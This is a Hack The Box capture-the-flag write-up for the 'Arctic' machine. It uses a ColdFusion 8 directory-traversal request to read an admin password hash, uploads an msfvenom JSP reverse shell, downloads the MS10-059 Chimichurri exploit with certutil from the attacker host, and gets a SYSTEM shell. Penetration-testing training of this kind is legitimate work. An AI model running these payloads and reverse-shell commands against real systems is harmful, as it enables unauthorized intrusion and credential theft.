HTB - Artic

Getting Root:

Discovered the box is running Adobe ColdFusion 8 on port 80
Exploiting CVE-2010-2861 CVE-67047 we get a reverse shell
used MS-010-059 for privilege escalation and got SYSTEM

Tools Used:

nmap, msfvenon, windows-exploit-suggester.py

Nmap

# Nmap 7.80 scan initiated Thu Mar  5 17:34:43 2020 as: nmap -sC -sV -p- -oA nmap/Artic 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.060s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar  5 17:40:13 2020 -- 1 IP address (1 host up) scanned in 330.62 seconds

Exploiting Cold Fusion 8

Exploit

Adobe ColdFusion - Directory TraversalExploit Database

# Request sent to the Cold Fusion Web App
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Cracking the Hash

2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday

We have admin access and we can see the path of the application is: C:\ColdFusion8\wwwroot\CFIDE

Getting a Shell

Generate a shell with msfvenon

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=53 -f raw > shell.jsp

Uploading the shell to the target

Triggering the shell

http://10.10.10.11:8500/CFIDE/shell.jsp

# rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49590
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

Privilege Escalation

I don't want to use metasploit so I am going with the MS10-059

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Compiled binary for MS10-059

windows-kernel-exploits/MS10-059: Chimichurri at master · egre55/windows-kernel-exploitsGitHub

Downloaded the executable to the victim

# c:\ColdFusion8\wwwroot\CFIDE>certutil -urlcache -f -split http://10.10.14.2/Chimichurri.exe

Executing the exploit

# c:\ColdFusion8\wwwroot\CFIDE>.\Chimichurri.exe 10.10.14.2 9001
.\Chimichurri.exe 10.10.14.2 9001
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

Get a reverse shell as SYSTEM

# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49569
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\ColdFusion8\wwwroot\CFIDE>whoami
whoami
nt authority\system

c:\ColdFusion8\wwwroot\CFIDE>

Root Flag

Directory of c:\Users\Administrator\Desktop

22/03/2017  09:02     <DIR>          .
22/03/2017  09:02     <DIR>          ..
22/03/2017  09:02                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.181.310.976 bytes free

c:\Users\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

PreviousHTB - Tenten NextHTB - Bounty

Last updated 5 years ago

hashtagGetting Root:

hashtagTools Used:

hashtagNmap

hashtagExploiting Cold Fusion 8

hashtagExploit

hashtagCracking the Hash

hashtagAdmin Login

hashtagGetting a Shell

hashtagGenerate a shell with msfvenon

hashtagUploading the shell to the target

hashtagTriggering the shell

hashtagPrivilege Escalation

hashtagCompiled binary for MS10-059

hashtagDownloaded the executable to the victim

hashtagExecuting the exploit

hashtagGet a reverse shell as SYSTEM

hashtagRoot Flag